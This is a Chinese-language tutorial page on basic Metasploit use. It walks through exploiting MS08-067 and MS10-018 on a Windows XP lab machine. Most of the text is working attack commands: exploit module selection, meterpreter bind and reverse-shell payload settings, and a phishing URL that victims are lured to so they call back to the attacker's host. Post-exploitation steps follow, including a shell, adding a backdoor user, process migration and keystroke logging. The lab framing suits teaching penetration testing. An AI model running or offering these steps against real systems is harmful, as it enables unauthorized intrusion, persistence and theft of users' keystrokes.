当前位置: 首页 > news >正文

MSF的基础使用

以两个windows主机层面的漏洞,简单演示一下msf框架的使用。

MS08-067

简介

影响范围:MS08-067漏洞会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

漏洞产生的原因及攻击效果:如果用户在受影响的系统上收到特制的 RPC 请求,则可能导致攻击者在未经身份验证的情况下利用此漏洞运行任意代码,实现远程代码执行。现阶段,已经可以通过防火墙来阻断该漏洞的攻击。

漏洞利用

先测试网络连通性

1.输入msfconsole进入msf终端

2.查找利用ms08-067漏洞利用模块

search ms08-067
use exploit/windows/smb/ms08_067_netapi

3.查看该攻击模块下所需的配置信息

show options

4.设置options

设置攻击payload为bind模式

set payload windows/meterpreter/bind_tcp

reverse_tcp 反弹shell xp主动连接kali

bind_tcp:主动连接 kali主动攻击xp 不需要xp主机用户做啥操作,啥都不做就会被打

设置靶机地址:

set RHOST 192.168.1.6

查看targets

选择攻击目标

set target 34

5.检查options配置

6.expliot利用该漏洞 出现meterpreter则代表利用成功 拿到了系统的shell

后渗透

出现meterpreter则代表漏洞利用成功 接下来可以做一些后渗透的动作了

比如查看配置 进入win命令行 添加用户 键盘监听等

1.进入Windows Shell

shell

刚刚还是在msf攻击的控制台 现在是在windows的shell命令行

2.添加用户

net user didi 123 /add

3.使用 ps 查看进程

4.使用ps找到合适的进程进行迁移,迁移到有管理员权限的进程

比如我迁移到ie浏览器进程

开启键盘记录后 在xp浏览器端不管键盘敲什么都会被记录下来

执行keyscan_dump查看记录的情况

keyscan_stop 关闭键盘记录

MS10-018漏洞

简介

MS10-018是IE浏览器上的漏洞,主要危害Internet Explorer 6~7,攻击者可以通过该漏洞获取受害主机的控制权。

┗|`O′|┛ 嗷~~ 是打浏览器的漏洞,不是打系统的,但是同样可以达到RCE的效果

漏洞利用

实验环境:kali虚拟机 winxp虚拟机

先把防火墙打开 否则不需要受害者主机浏览器访问触发反弹shell就能执行成功

msf杀死某个session的命令

sessions -k 1

1.启动msf 搜索ms10_018

msfconsole search ms10_018

2.使用对应的exploit

use exploit/windows/browser/ms10_018_ie_behaviors

3.查看需要的配置 并且进行配置

payload采用reverse_tcp反弹shell的方式

所以需要反弹地址SRVHOST

可以设置其他地址 我们还是设置kali机器为反弹地址

此外也可以设置一下 URIPATH 这是钓鱼网站的url 需要受害者主机去访问该url 才能进行反弹shell

set SRVHOST 192.168.1.134 set URIPATH test666

查看修改后的配置

4.运行exploit

5.受害者主机访问http://192.168.1.134:8080/test666

6.反弹shell成功

7.进入会话中利用该会话

http://www.cnnetsun.cn/news/42212.html

相关文章:

  • 基于Java的安全检查巡视智慧管理系统的设计与实现全方位解析:附毕设论文+源代码
  • 基于Java的安全生产指标智慧管理系统的设计与实现全方位解析:附毕设论文+源代码
  • 基于Java的安全生产水利工程智慧管理系统的设计与实现全方位解析:附毕设论文+源代码
  • 极客时间-DeepSeek应用开发实战
  • Vue.Draggable高效拖拽排序实战指南:5分钟掌握核心用法
  • c语言学习打卡
  • LangChain 文档转换器与字符分割器组件的使用
  • 科研绘图不用愁!虎贲等考 AI 用算法代替画笔,手残党也能轻松搞定学术视觉表达
  • 告别论文恐惧!虎贲等考 AI 化身灵感合伙人,带你解锁课程论文的知识创造之旅
  • ComfyUI-SeedVR2视频超分项目FP8量化技术深度解析
  • 全网最全的软件测试面试八股文(含真题答案+文档)
  • OpenResume专业简历制作工具完整使用指南
  • springboot肿瘤患者康复回访系统_109a2sb0-
  • 【KL 散度】深入理解 Kullback-Leibler Divergence:AI 如何衡量“像不像”的问题
  • 5分钟掌握LIBERO:开启终身机器人学习的革命性平台
  • 文件上传革命:jQuery File Upload如何让开发效率飙升500%
  • SolidWorks三维模型与工程图差距分析介绍
  • COMSOL模拟锌离子电池锌负极电场模型教程:从零开始构建并详细解析源文件,适合初学者的电场建模教学
  • 终极指南:如何用PIKE-RAG打造领域专属的智能问答系统
  • 5分钟从文档小白到OCR专家:Zerox如何让文字识别变得像拍照一样简单
  • RocketMQ如何防止消息丢失?
  • CSS尺寸、盒子模型、定位、浮动与布局(Flex/Grid)
  • 《构建游戏实时流失预警模型的核心逻辑》
  • 两个步骤,打包war,tomcat使用war包
  • idea修改maven的刷新引入依赖快捷键
  • 纯电动汽车Simulink仿真模型建模详细步骤。 通过文档的形式,跟着文档一步一步操作,既可以...
  • 同花顺平衡多空看图操作多空理论
  • 通达信222222测试帖别下载
  • 通达信大盘个股共振指标公式
  • 这些核心特征,让芯片散料转编带设备成行业刚需